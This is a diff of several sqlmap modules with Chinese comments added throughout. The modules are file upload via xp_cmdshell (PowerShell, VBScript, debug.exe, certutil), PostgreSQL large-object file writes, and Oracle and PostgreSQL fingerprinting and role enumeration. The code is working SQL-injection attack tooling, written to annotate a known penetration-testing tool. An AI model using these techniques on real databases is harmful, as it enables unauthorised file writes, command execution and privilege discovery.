errMsg += "file '%s'" % remoteFile
raise SqlmapNoneDataException(errMsg)
indexRange = getLimitRange(count)
indexRange = getLimitRange(count) # 生成索引范围
# 遍历索引范围,逐行读取十六进制数据
for index in indexRange:
chunk = inject.getValue("SELECT TOP 1 %s FROM %s WHERE %s NOT IN (SELECT TOP %d %s FROM %s ORDER BY id ASC) ORDER BY id ASC" % (self.tblField, hexTbl, self.tblField, index, self.tblField, hexTbl), unpack=False, resumeValue=False, charsetType=CHARSET_TYPE.HEXADECIMAL)
result.append(chunk)
inject.goStacked("DROP TABLE %s" % hexTbl)
inject.goStacked("DROP TABLE %s" % hexTbl) # 删除十六进制表
return result
return result # 返回读取的文件内容
# 定义 unionWriteFile 方法,用于使用 UNION 注入写入文件,但此方法不支持 SQL Server
def unionWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):
errMsg = "Microsoft SQL Server does not support file upload with "
errMsg += "UNION query SQL injection technique"
raise SqlmapUnsupportedFeatureException(errMsg)
# 定义 _stackedWriteFilePS 方法,用于使用 PowerShell 写入文件内容
def _stackedWriteFilePS(self, tmpPath, localFileContent, remoteFile, fileType):
infoMsg = "using PowerShell to write the %s file content " % fileType
infoMsg += "to file '%s'" % remoteFile
logger.info(infoMsg)
encodedFileContent = encodeBase64(localFileContent, binary=False)
encodedBase64File = "tmpf%s.txt" % randomStr(lowercase=True)
encodedBase64FilePath = "%s\\%s" % (tmpPath, encodedBase64File)
encodedFileContent = encodeBase64(localFileContent, binary=False) # 将文件内容进行 Base64 编码
encodedBase64File = "tmpf%s.txt" % randomStr(lowercase=True) # 生成随机的 Base64 文件名
encodedBase64FilePath = "%s\\%s" % (tmpPath, encodedBase64File) # 构建 Base64 文件路径
randPSScript = "tmpps%s.ps1" % randomStr(lowercase=True)
randPSScriptPath = "%s\\%s" % (tmpPath, randPSScript)
randPSScript = "tmpps%s.ps1" % randomStr(lowercase=True) # 生成随机的 PowerShell 脚本文件名
randPSScriptPath = "%s\\%s" % (tmpPath, randPSScript) # 构建 PowerShell 脚本路径
localFileSize = len(encodedFileContent)
chunkMaxSize = 1024
localFileSize = len(encodedFileContent) # 获取 Base64 编码后的文件大小
chunkMaxSize = 1024 # 设置最大 chunk 大小
logger.debug("uploading the base64-encoded file to %s, please wait.." % encodedBase64FilePath)
# 循环上传 Base64 编码后的文件内容
for i in xrange(0, localFileSize, chunkMaxSize):
wEncodedChunk = encodedFileContent[i:i + chunkMaxSize]
self.xpCmdshellWriteFile(wEncodedChunk, tmpPath, encodedBase64File)
self.xpCmdshellWriteFile(wEncodedChunk, tmpPath, encodedBase64File) # 使用 xp_cmdshell 将 Base64 编码后的文件内容写入到服务器
# 构建 PowerShell 脚本
psString = "$Base64 = Get-Content -Path \"%s\"; " % encodedBase64FilePath
psString += "$Base64 = $Base64 -replace \"`t|`n|`r\",\"\"; $Content = "
psString += "[System.Convert]::FromBase64String($Base64); Set-Content "
psString += "-Path \"%s\" -Value $Content -Encoding Byte" % remoteFile
logger.debug("uploading the PowerShell base64-decoding script to %s" % randPSScriptPath)
self.xpCmdshellWriteFile(psString, tmpPath, randPSScript)
self.xpCmdshellWriteFile(psString, tmpPath, randPSScript) # 使用 xp_cmdshell 将 PowerShell 脚本写入到服务器
logger.debug("executing the PowerShell base64-decoding script to write the %s file, please wait.." % remoteFile)
# 执行 PowerShell 脚本,将 Base64 编码后的文件内容解码并写入到目标文件
commands = (
"powershell -ExecutionPolicy ByPass -File \"%s\"" % randPSScriptPath,
"del /F /Q \"%s\"" % encodedBase64FilePath,
@ -208,23 +224,26 @@ class Filesystem(GenericFilesystem):
self.execCmd(" & ".join(command for command in commands))
# 定义 _stackedWriteFileDebugExe 方法,用于使用 debug.exe 写入文件内容
def _stackedWriteFileDebugExe(self, tmpPath, localFile, localFileContent, remoteFile, fileType):
infoMsg = "using debug.exe to write the %s " % fileType
infoMsg += "file content to file '%s', please wait.." % remoteFile
logger.info(infoMsg)
remoteFileName = ntpath.basename(remoteFile)
sFile = "%s\\%s" % (tmpPath, remoteFileName)
localFileSize = os.path.getsize(localFile)
debugSize = 0xFF00
remoteFileName = ntpath.basename(remoteFile) # 获取远程文件名
sFile = "%s\\%s" % (tmpPath, remoteFileName) # 构建远程文件路径
localFileSize = os.path.getsize(localFile) # 获取本地文件大小
debugSize = 0xFF00 # 设置 debug.exe 的最大写入大小
# 如果文件小于 debug.exe 的最大写入大小,则直接写入
if localFileSize < debugSize:
chunkName = self._updateDestChunk(localFileContent, tmpPath)
chunkName = self._updateDestChunk(localFileContent, tmpPath) # 将文件内容转换为 debug.exe 脚本并生成 chunk 文件
debugMsg = "renaming chunk file %s\\%s to %s " % (tmpPath, chunkName, fileType)
debugMsg += "file %s\\%s and moving it to %s" % (tmpPath, remoteFileName, remoteFile)
logger.debug(debugMsg)
# 将 chunk 文件重命名为目标文件名并移动到目标路径
commands = (
"cd \"%s\"" % tmpPath,
"ren %s %s" % (chunkName, remoteFileName),
@ -232,6 +251,7 @@ class Filesystem(GenericFilesystem):
)
self.execCmd(" & ".join(command for command in commands))
# 如果文件大于 debug.exe 的最大写入大小,则分块写入
else:
debugMsg = "the file is larger than %d bytes. " % debugSize
debugMsg += "sqlmap will split it into chunks locally, upload "
@ -239,10 +259,12 @@ class Filesystem(GenericFilesystem):
debugMsg += "on the server, please wait.."
logger.debug(debugMsg)
# 循环分块写入文件
for i in xrange(0, localFileSize, debugSize):
localFileChunk = localFileContent[i:i + debugSize]
chunkName = self._updateDestChunk(localFileChunk, tmpPath)
localFileChunk = localFileContent[i:i + debugSize] # 获取文件 chunk
chunkName = self._updateDestChunk(localFileChunk, tmpPath) # 将文件 chunk 转换为 debug.exe 脚本并生成 chunk 文件
# 如果是第一个 chunk则重命名否则合并 chunk
if i == 0:
debugMsg = "renaming chunk "
copyCmd = "ren %s %s" % (chunkName, remoteFileName)
@ -253,6 +275,7 @@ class Filesystem(GenericFilesystem):
debugMsg += "%s\\%s to %s file %s\\%s" % (tmpPath, chunkName, fileType, tmpPath, remoteFileName)
logger.debug(debugMsg)
# 执行重命名或合并操作
commands = (
"cd \"%s\"" % tmpPath,
copyCmd,
@ -263,6 +286,7 @@ class Filesystem(GenericFilesystem):
logger.debug("moving %s file %s to %s" % (fileType, sFile, remoteFile))
# 将合并后的文件移动到目标路径
commands = (
"cd \"%s\"" % tmpPath,
"move /Y %s %s" % (remoteFileName, remoteFile)
@ -270,15 +294,17 @@ class Filesystem(GenericFilesystem):
self.execCmd(" & ".join(command for command in commands))
# 定义 _stackedWriteFileVbs 方法,用于使用 VBScript 写入文件内容
def _stackedWriteFileVbs(self, tmpPath, localFileContent, remoteFile, fileType):
infoMsg = "using a custom visual basic script to write the "
infoMsg += "%s file content to file '%s', please wait.." % (fileType, remoteFile)
logger.info(infoMsg)
randVbs = "tmps%s.vbs" % randomStr(lowercase=True)
randFile = "tmpf%s.txt" % randomStr(lowercase=True)
randFilePath = "%s\\%s" % (tmpPath, randFile)
randVbs = "tmps%s.vbs" % randomStr(lowercase=True) # 生成随机的 VBScript 文件名
randFile = "tmpf%s.txt" % randomStr(lowercase=True) # 生成随机的临时文件名
randFilePath = "%s\\%s" % (tmpPath, randFile) # 构建临时文件路径
# 构建 VBScript 脚本
vbs = """Qvz vachgSvyrCngu, bhgchgSvyrCngu
vachgSvyrCngu = "%f"
bhgchgSvyrCngu = "%f"
@ -334,18 +360,17 @@ class Filesystem(GenericFilesystem):
Raq Shapgvba"""
# NOTE: https://github.com/sqlmapproject/sqlmap/issues/5581
vbs = rot13(vbs)
vbs = vbs.replace(" ", "")
encodedFileContent = encodeBase64(localFileContent, binary=False)
vbs = rot13(vbs) # 对 VBScript 脚本进行 ROT13 编码
vbs = vbs.replace(" ", "") # 移除多余空格
encodedFileContent = encodeBase64(localFileContent, binary=False) # 将文件内容进行 Base64 编码
logger.debug("uploading the file base64-encoded content to %s, please wait.." % randFilePath)
self.xpCmdshellWriteFile(encodedFileContent, tmpPath, randFile)
self.xpCmdshellWriteFile(encodedFileContent, tmpPath, randFile) # 使用 xp_cmdshell 将 Base64 编码后的文件内容写入到服务器
logger.debug("uploading a visual basic decoder stub %s\\%s, please wait.." % (tmpPath, randVbs))
self.xpCmdshellWriteFile(vbs, tmpPath, randVbs) # 使用 xp_cmdshell 将 VBScript 脚本写入到服务器
self.xpCmdshellWriteFile(vbs, tmpPath, randVbs)
# 执行 VBScript 脚本,将 Base64 编码后的文件内容解码并写入到目标文件
commands = (
"cd \"%s\"" % tmpPath,
"cscript //nologo %s" % randVbs,
@ -355,26 +380,28 @@ class Filesystem(GenericFilesystem):
self.execCmd(" & ".join(command for command in commands))
# 定义 _stackedWriteFileCertutilExe 方法,用于使用 certutil.exe 写入文件内容
def _stackedWriteFileCertutilExe(self, tmpPath, localFile, localFileContent, remoteFile, fileType):
infoMsg = "using certutil.exe to write the %s " % fileType
infoMsg += "file content to file '%s', please wait.." % remoteFile
logger.info(infoMsg)
chunkMaxSize = 500
chunkMaxSize = 500 # 设置最大 chunk 大小
randFile = "tmpf%s.txt" % randomStr(lowercase=True)
randFilePath = "%s\\%s" % (tmpPath, randFile)
randFile = "tmpf%s.txt" % randomStr(lowercase=True) # 生成随机的文件名
randFilePath = "%s\\%s" % (tmpPath, randFile) # 构建文件路径
encodedFileContent = encodeBase64(localFileContent, binary=False)
encodedFileContent = encodeBase64(localFileContent, binary=False) # 将文件内容进行 Base64 编码
splittedEncodedFileContent = '\n'.join([encodedFileContent[i:i + chunkMaxSize] for i in xrange(0, len(encodedFileContent), chunkMaxSize)])
splittedEncodedFileContent = '\
'.join([encodedFileContent[i:i + chunkMaxSize] for i in xrange(0, len(encodedFileContent), chunkMaxSize)]) # 分块 Base64 编码文件内容
logger.debug("uploading the file base64-encoded content to %s, please wait.." % randFilePath)
self.xpCmdshellWriteFile(splittedEncodedFileContent, tmpPath, randFile)
self.xpCmdshellWriteFile(splittedEncodedFileContent, tmpPath, randFile) # 使用 xp_cmdshell 将分块 Base64 编码后的文件内容写入到服务器
logger.debug("decoding the file to %s.." % remoteFile)
# 执行 certutil.exe 命令,将 Base64 编码后的文件内容解码并写入到目标文件
commands = (
"cd \"%s\"" % tmpPath,
"certutil -f -decode %s %s" % (randFile, remoteFile),
@ -383,6 +410,7 @@ class Filesystem(GenericFilesystem):
self.execCmd(" & ".join(command for command in commands))
# 定义 stackedWriteFile 方法,用于使用堆叠查询写入文件
def stackedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):
# NOTE: this is needed here because we use xp_cmdshell extended
# procedure to write a file on the back-end Microsoft SQL Server
@ -390,15 +418,16 @@ class Filesystem(GenericFilesystem):
self.initEnv()
self.getRemoteTempPath()
tmpPath = posixToNtSlashes(conf.tmpPath)
remoteFile = posixToNtSlashes(remoteFile)
tmpPath = posixToNtSlashes(conf.tmpPath) # 获取临时路径并转换为 NT 路径
remoteFile = posixToNtSlashes(remoteFile) # 将远程文件名转换为 NT 路径
checkFile(localFile)
localFileContent = open(localFile, "rb").read()
checkFile(localFile) # 检查本地文件是否存在
localFileContent = open(localFile, "rb").read() # 读取本地文件内容
self._stackedWriteFilePS(tmpPath, localFileContent, remoteFile, fileType)
written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck)
self._stackedWriteFilePS(tmpPath, localFileContent, remoteFile, fileType) # 尝试使用 PowerShell 写入文件
written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck) # 询问是否成功写入
# 如果 PowerShell 写入失败,则尝试使用 VBScript 写入文件
if written is False:
message = "do you want to try to upload the file with "
message += "the custom Visual Basic script technique? [Y/n] "
@ -407,6 +436,7 @@ class Filesystem(GenericFilesystem):
self._stackedWriteFileVbs(tmpPath, localFileContent, remoteFile, fileType)
written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck)
# 如果 VBScript 写入失败,则尝试使用 debug.exe 写入文件
if written is False:
message = "do you want to try to upload the file with "
message += "the built-in debug.exe technique? [Y/n] "
@ -415,6 +445,7 @@ class Filesystem(GenericFilesystem):
self._stackedWriteFileDebugExe(tmpPath, localFile, localFileContent, remoteFile, fileType)
written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck)
# 如果 debug.exe 写入失败,则尝试使用 certutil.exe 写入文件
if written is False:
message = "do you want to try to upload the file with "
message += "the built-in certutil.exe technique? [Y/n] "
@ -423,4 +454,4 @@ class Filesystem(GenericFilesystem):
self._stackedWriteFileCertutilExe(tmpPath, localFile, localFileContent, remoteFile, fileType)
written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck)
return written
return written # 返回是否成功写入

@ -5,85 +5,91 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
from lib.core.common import getLimitRange
from lib.core.common import isAdminFromPrivileges
from lib.core.common import isInferenceAvailable
from lib.core.common import isNoneValue
from lib.core.common import isNumPosStrValue
from lib.core.common import isTechniqueAvailable
from lib.core.compat import xrange
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import queries
from lib.core.enums import CHARSET_TYPE
from lib.core.enums import DBMS
from lib.core.enums import EXPECTED
from lib.core.enums import PAYLOAD
from lib.core.exception import SqlmapNoneDataException
from lib.core.settings import CURRENT_USER
from lib.request import inject
from plugins.generic.enumeration import Enumeration as GenericEnumeration
# 1. 导入必要的模块
from lib.core.common import getLimitRange # 获取限制范围
from lib.core.common import isAdminFromPrivileges # 判断是否为管理员
from lib.core.common import isInferenceAvailable # 判断是否可以使用推断注入
from lib.core.common import isNoneValue # 判断是否为 None 值
from lib.core.common import isNumPosStrValue # 判断是否为数字正字符串值
from lib.core.common import isTechniqueAvailable # 判断是否可以使用特定注入技术
from lib.core.compat import xrange # 兼容 Python 2 和 3 的 xrange
from lib.core.data import conf # 全局配置信息
from lib.core.data import kb # 全局知识库
from lib.core.data import logger # 日志记录器
from lib.core.data import queries # SQL 查询语句
from lib.core.enums import CHARSET_TYPE # 字符集类型枚举
from lib.core.enums import DBMS # 数据库管理系统枚举
from lib.core.enums import EXPECTED # 预期返回类型枚举
from lib.core.enums import PAYLOAD # 注入类型枚举
from lib.core.exception import SqlmapNoneDataException # 没有数据异常
from lib.core.settings import CURRENT_USER # 当前用户
from lib.request import inject # 注入相关函数
from plugins.generic.enumeration import Enumeration as GenericEnumeration # 通用枚举类
# 2. 定义一个类 Enumeration继承自 GenericEnumeration
class Enumeration(GenericEnumeration):
# 3. 获取数据库用户角色
def getRoles(self, query2=False):
# 4. 输出获取数据库用户角色信息
infoMsg = "fetching database users roles"
# 5. 从查询集中获取角色查询语句
rootQuery = queries[DBMS.ORACLE].roles
# 6. 如果用户名为当前用户,则获取当前用户名
if conf.user == CURRENT_USER:
infoMsg += " for current user"
conf.user = self.getCurrentUser()
logger.info(infoMsg)
# Set containing the list of DBMS administrators
# 7. 存储管理员用户的集合
areAdmins = set()
# 8. 检查是否存在可用的注入技术或直接连接
if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct:
# 9. 选择使用哪个查询语句
if query2:
query = rootQuery.inband.query2
condition = rootQuery.inband.condition2
else:
query = rootQuery.inband.query
condition = rootQuery.inband.condition
# 10. 如果指定了用户名,则添加到查询条件中
if conf.user:
users = conf.user.split(',')
query += " WHERE "
query += " OR ".join("%s = '%s'" % (condition, user) for user in sorted(users))
# 11. 执行查询语句,获取用户角色信息
values = inject.getValue(query, blind=False, time=False)
# 12. 如果没有获取到数据,尝试使用备用表 `USER_ROLE_PRIVS`
if not values and not query2:
infoMsg = "trying with table 'USER_ROLE_PRIVS'"
logger.info(infoMsg)
return self.getRoles(query2=True)
# 13. 处理获取到的用户角色信息
if not isNoneValue(values):
for value in values:
user = None
roles = set()
for count in xrange(0, len(value or [])):
# The first column is always the username
# 14. 第一列为用户名
if count == 0:
user = value[count]
# The other columns are the roles
# 15. 其他列为角色
else:
role = value[count]
# In Oracle we get the list of roles as string
roles.add(role)
# 16. 将用户角色信息添加到缓存中
if user in kb.data.cachedUsersRoles:
kb.data.cachedUsersRoles[user] = list(roles.union(kb.data.cachedUsersRoles[user]))
else:
kb.data.cachedUsersRoles[user] = list(roles)
# 17. 如果没有获取到用户角色信息,尝试使用推断注入
if not kb.data.cachedUsersRoles and isInferenceAvailable() and not conf.direct:
# 18. 获取用户名列表
if conf.user:
users = conf.user.split(',')
else:
@ -93,13 +99,11 @@ class Enumeration(GenericEnumeration):
users = kb.data.cachedUsers
retrievedUsers = set()
# 19. 遍历用户列表,获取每个用户的角色信息
for user in users:
unescapedUser = None
if user in retrievedUsers:
continue
infoMsg = "fetching number of roles "
infoMsg += "for user '%s'" % user
logger.info(infoMsg)
@ -113,13 +117,13 @@ class Enumeration(GenericEnumeration):
query = rootQuery.blind.count2 % queryUser
else:
query = rootQuery.blind.count % queryUser
# 20. 获取每个用户的角色数量
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
# 21. 如果没有获取到角色数量,尝试使用备用表 `USER_SYS_PRIVS`
if not isNumPosStrValue(count):
if count != 0 and not query2:
infoMsg = "trying with table 'USER_SYS_PRIVS'"
logger.info(infoMsg)
return self.getPrivileges(query2=True)
warnMsg = "unable to retrieve the number of "
@ -133,33 +137,33 @@ class Enumeration(GenericEnumeration):
roles = set()
indexRange = getLimitRange(count, plusOne=True)
# 22. 遍历角色索引,获取每个角色信息
for index in indexRange:
if query2:
query = rootQuery.blind.query2 % (queryUser, index)
else:
query = rootQuery.blind.query % (queryUser, index)
role = inject.getValue(query, union=False, error=False)
# In Oracle we get the list of roles as string
role = inject.getValue(query, union=False, error=False)
roles.add(role)
# 23. 将获取到的角色信息添加到缓存中
if roles:
kb.data.cachedUsersRoles[user] = list(roles)
else:
warnMsg = "unable to retrieve the roles "
warnMsg += "for user '%s'" % user
logger.warning(warnMsg)
retrievedUsers.add(user)
# 24. 如果没有获取到用户角色信息,抛出异常
if not kb.data.cachedUsersRoles:
errMsg = "unable to retrieve the roles "
errMsg += "for the database users"
raise SqlmapNoneDataException(errMsg)
# 25. 从角色信息中判断管理员用户
for user, privileges in kb.data.cachedUsersRoles.items():
if isAdminFromPrivileges(privileges):
areAdmins.add(user)
return kb.data.cachedUsersRoles, areAdmins
# 26. 返回用户角色信息和管理员用户
return kb.data.cachedUsersRoles, areAdmins

@ -5,106 +5,120 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
import re
from lib.core.common import Backend
from lib.core.common import Format
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.enums import DBMS
from lib.core.session import setDbms
from lib.core.settings import ORACLE_ALIASES
from lib.request import inject
from plugins.generic.fingerprint import Fingerprint as GenericFingerprint
# 1. 导入必要的模块
import re # 正则表达式模块
from lib.core.common import Backend # 后端数据库信息
from lib.core.common import Format # 格式化输出
from lib.core.data import conf # 全局配置信息
from lib.core.data import kb # 全局知识库
from lib.core.data import logger # 日志记录器
from lib.core.enums import DBMS # 数据库管理系统枚举
from lib.core.session import setDbms # 设置数据库管理系统
from lib.core.settings import ORACLE_ALIASES # Oracle 数据库别名
from lib.request import inject # 注入相关函数
from plugins.generic.fingerprint import Fingerprint as GenericFingerprint # 通用指纹识别类
# 2. 定义一个类 Fingerprint继承自 GenericFingerprint
class Fingerprint(GenericFingerprint):
# 3. 构造函数,初始化数据库类型为 Oracle
def __init__(self):
GenericFingerprint.__init__(self, DBMS.ORACLE)
# 4. 获取指纹信息
def getFingerprint(self):
value = ""
# 5. 获取 Web 服务器的操作系统指纹
wsOsFp = Format.getOs("web server", kb.headersFp)
if wsOsFp:
value += "%s\n" % wsOsFp
value += "%s\
" % wsOsFp
# 6. 获取后端数据库的操作系统指纹
if kb.data.banner:
dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp)
if dbmsOsFp:
value += "%s\n" % dbmsOsFp
value += "%s\
" % dbmsOsFp
value += "back-end DBMS: "
# 7. 如果没有启用详细指纹识别,则只输出数据库类型
if not conf.extensiveFp:
value += DBMS.ORACLE
return value
# 8. 获取激活的数据库指纹
actVer = Format.getDbms()
blank = " " * 15
value += "active fingerprint: %s" % actVer
# 9. 如果有 Banner 信息,则获取 Banner 解析指纹
if kb.bannerFp:
banVer = kb.bannerFp.get("dbmsVersion")
if banVer:
banVer = Format.getDbms([banVer])
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
value += "\
%sbanner parsing fingerprint: %s" % (blank, banVer)
# 10. 如果有 HTML 错误信息,则获取 HTML 错误指纹
htmlErrorFp = Format.getErrorParsedDBMSes()
if htmlErrorFp:
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
value += "\
%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
return value
# 11. 检查数据库类型是否为 Oracle
def checkDbms(self):
# 12. 如果没有启用详细指纹识别,并且后端数据库是 Oracle 的别名,则设置数据库类型并返回 True
if not conf.extensiveFp and Backend.isDbmsWithin(ORACLE_ALIASES):
setDbms(DBMS.ORACLE)
self.getBanner()
return True
# 13. 输出测试数据库类型信息
infoMsg = "testing %s" % DBMS.ORACLE
logger.info(infoMsg)
# NOTE: SELECT LENGTH(SYSDATE)=LENGTH(SYSDATE) FROM DUAL does
# not work connecting directly to the Oracle database
# 14. 如果是直接连接,则跳过以下测试
if conf.direct:
result = True
# 15. 否则,测试数据库是否满足条件 LENGTH(SYSDATE)=LENGTH(SYSDATE)
else:
result = inject.checkBooleanExpression("LENGTH(SYSDATE)=LENGTH(SYSDATE)")
# 16. 如果测试结果为 True则进一步确认数据库类型
if result:
infoMsg = "confirming %s" % DBMS.ORACLE
logger.info(infoMsg)
# NOTE: SELECT NVL(RAWTOHEX([RANDNUM1]),[RANDNUM1])=RAWTOHEX([RANDNUM1]) FROM DUAL does
# not work connecting directly to the Oracle database
# 17. 如果是直接连接,则跳过以下测试
if conf.direct:
result = True
# 18. 否则,测试数据库是否满足条件 NVL(RAWTOHEX([RANDNUM1]),[RANDNUM1])=RAWTOHEX([RANDNUM1])
else:
result = inject.checkBooleanExpression("NVL(RAWTOHEX([RANDNUM1]),[RANDNUM1])=RAWTOHEX([RANDNUM1])")
# 19. 如果测试结果为 False则输出警告信息并返回 False
if not result:
warnMsg = "the back-end DBMS is not %s" % DBMS.ORACLE
logger.warning(warnMsg)
return False
# 20. 设置数据库类型为 Oracle
setDbms(DBMS.ORACLE)
self.getBanner()
# 21. 如果没有启用详细指纹识别,则直接返回 True
if not conf.extensiveFp:
return True
# 22. 输出开始详细指纹识别信息
infoMsg = "actively fingerprinting %s" % DBMS.ORACLE
logger.info(infoMsg)
# Reference: https://en.wikipedia.org/wiki/Oracle_Database
# 23. 尝试匹配数据库版本
for version in ("23c", "21c", "19c", "18c", "12c", "11g", "10g", "9i", "8i", "7"):
number = int(re.search(r"([\d]+)", version).group(1))
output = inject.checkBooleanExpression("%d=(SELECT SUBSTR((VERSION),1,%d) FROM SYS.PRODUCT_COMPONENT_VERSION WHERE ROWNUM=1)" % (number, 1 if number < 10 else 2))
@ -114,15 +128,15 @@ class Fingerprint(GenericFingerprint):
break
return True
# 24. 如果初始测试结果为 False则输出警告信息并返回 False
else:
warnMsg = "the back-end DBMS is not %s" % DBMS.ORACLE
logger.warning(warnMsg)
return False
# 25. 强制枚举数据库对象名称为大写
def forceDbmsEnum(self):
if conf.db:
conf.db = conf.db.upper()
if conf.tbl:
conf.tbl = conf.tbl.upper()
conf.tbl = conf.tbl.upper()

@ -5,79 +5,91 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
import os
from lib.core.common import randomInt
from lib.core.compat import xrange
from lib.core.data import kb
from lib.core.data import logger
from lib.core.exception import SqlmapUnsupportedFeatureException
from lib.core.settings import LOBLKSIZE
from lib.request import inject
from plugins.generic.filesystem import Filesystem as GenericFilesystem
# 1. 导入所需的模块
import os # 操作系统相关模块
from lib.core.common import randomInt # 生成随机整数
from lib.core.compat import xrange # 兼容 Python 2 和 3 的 xrange
from lib.core.data import kb # 全局知识库
from lib.core.data import logger # 日志记录器
from lib.core.exception import SqlmapUnsupportedFeatureException # 不支持的特性异常
from lib.core.settings import LOBLKSIZE # Large Object Block Size
from lib.request import inject # 注入相关函数
from plugins.generic.filesystem import Filesystem as GenericFilesystem # 通用文件系统类
# 2. 定义一个类 Filesystem继承自 GenericFilesystem
class Filesystem(GenericFilesystem):
# 3. 构造函数,初始化变量
def __init__(self):
self.oid = None
self.page = None
self.oid = None # Large Object OID
self.page = None # Large Object page number
GenericFilesystem.__init__(self)
# 4. 使用 stacked query 读取文件
def stackedReadFile(self, remoteFile):
# 5. 如果不是暴力破解模式,则输出读取文件信息
if not kb.bruteMode:
infoMsg = "fetching file: '%s'" % remoteFile
logger.info(infoMsg)
# 6. 初始化环境
self.initEnv()
# 7. 调用 UDF 执行读取文件操作,返回读取的内容
return self.udfEvalCmd(cmd=remoteFile, udfName="sys_fileread")
# 8. 使用 UNION query 写入文件PostgreSQL 不支持)
def unionWriteFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
# 9. 输出不支持的信息并抛出异常
errMsg = "PostgreSQL does not support file upload with UNION "
errMsg += "query SQL injection technique"
raise SqlmapUnsupportedFeatureException(errMsg)
# 10. 使用 stacked query 写入文件
def stackedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):
# 11. 获取本地文件大小
localFileSize = os.path.getsize(localFile)
# 12. 读取本地文件内容
content = open(localFile, "rb").read()
# 13. 生成随机 OID 和初始页码
self.oid = randomInt()
self.page = 0
# 14. 创建支持表
self.createSupportTbl(self.fileTblName, self.tblField, "text")
# 15. 输出调试信息
debugMsg = "create a new OID for a large object, it implicitly "
debugMsg += "adds an entry in the large objects system table"
logger.debug(debugMsg)
# References:
# http://www.postgresql.org/docs/8.3/interactive/largeobjects.html
# http://www.postgresql.org/docs/8.3/interactive/lo-funcs.html
# 16. 删除已存在的 Large Object创建新的 Large Object并清理 Large Object 表
inject.goStacked("SELECT lo_unlink(%d)" % self.oid)
inject.goStacked("SELECT lo_create(%d)" % self.oid)
inject.goStacked("DELETE FROM pg_largeobject WHERE loid=%d" % self.oid)
# 17. 循环读取文件内容,分块写入 Large Object
for offset in xrange(0, localFileSize, LOBLKSIZE):
# 18. 对文件内容进行 base64 编码
fcEncodedList = self.fileContentEncode(content[offset:offset + LOBLKSIZE], "base64", False)
# 19. 将 base64 编码的文件内容转换为 SQL 查询语句
sqlQueries = self.fileToSqlQueries(fcEncodedList)
# 20. 执行 SQL 查询语句
for sqlQuery in sqlQueries:
inject.goStacked(sqlQuery)
# 21. 向 Large Object 表插入数据
inject.goStacked("INSERT INTO pg_largeobject VALUES (%d, %d, DECODE((SELECT %s FROM %s), 'base64'))" % (self.oid, self.page, self.tblField, self.fileTblName))
# 22. 清理支持表
inject.goStacked("DELETE FROM %s" % self.fileTblName)
# 23. 更新页码
self.page += 1
# 24. 输出调试信息
debugMsg = "exporting the OID %s file content to " % fileType
debugMsg += "file '%s'" % remoteFile
logger.debug(debugMsg)
# 25. 使用 lo_export 函数将 Large Object 内容导出到文件
inject.goStacked("SELECT lo_export(%d, '%s')" % (self.oid, remoteFile), silent=True)
# 26. 检查文件是否写入成功
written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck)
# 27. 删除 Large Object
inject.goStacked("SELECT lo_unlink(%d)" % self.oid)
return written
# 28. 返回文件是否写入成功
return written

@ -5,29 +5,35 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
from lib.core.common import Backend
from lib.core.common import Format
from lib.core.common import hashDBRetrieve
from lib.core.common import hashDBWrite
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.enums import DBMS
from lib.core.enums import FORK
from lib.core.enums import HASHDB_KEYS
from lib.core.enums import OS
from lib.core.session import setDbms
from lib.core.settings import PGSQL_ALIASES
from lib.request import inject
from plugins.generic.fingerprint import Fingerprint as GenericFingerprint
# 1. 从库中导入所需的模块
from lib.core.common import Backend # 后端数据库信息
from lib.core.common import Format # 格式化输出
from lib.core.common import hashDBRetrieve # 从哈希数据库检索数据
from lib.core.common import hashDBWrite # 向哈希数据库写入数据
from lib.core.data import conf # 全局配置信息
from lib.core.data import kb # 全局知识库
from lib.core.data import logger # 日志记录器
from lib.core.enums import DBMS # 数据库类型枚举
from lib.core.enums import FORK # 数据库分支枚举
from lib.core.enums import HASHDB_KEYS # 哈希数据库键枚举
from lib.core.enums import OS # 操作系统枚举
from lib.core.session import setDbms # 设置当前数据库类型
from lib.core.settings import PGSQL_ALIASES # PostgreSQL 数据库的别名
from lib.request import inject # 注入相关函数
from plugins.generic.fingerprint import Fingerprint as GenericFingerprint # 通用指纹识别类
# 2. 定义一个类 Fingerprint继承自 GenericFingerprint
class Fingerprint(GenericFingerprint):
# 3. 构造函数,初始化数据库类型
def __init__(self):
GenericFingerprint.__init__(self, DBMS.PGSQL)
# 4. 获取指纹信息
def getFingerprint(self):
# 5. 从哈希数据库中检索数据库分支信息
fork = hashDBRetrieve(HASHDB_KEYS.DBMS_FORK)
# 6. 如果分支信息为空,则尝试识别数据库分支
if fork is None:
if inject.checkBooleanExpression("VERSION() LIKE '%CockroachDB%'"):
fork = FORK.COCKROACHDB
@ -47,92 +53,109 @@ class Fingerprint(GenericFingerprint):
fork = FORK.AURORA
else:
fork = ""
# 7. 将分支信息写入哈希数据库
hashDBWrite(HASHDB_KEYS.DBMS_FORK, fork)
value = ""
# 8. 获取 Web 服务器操作系统指纹
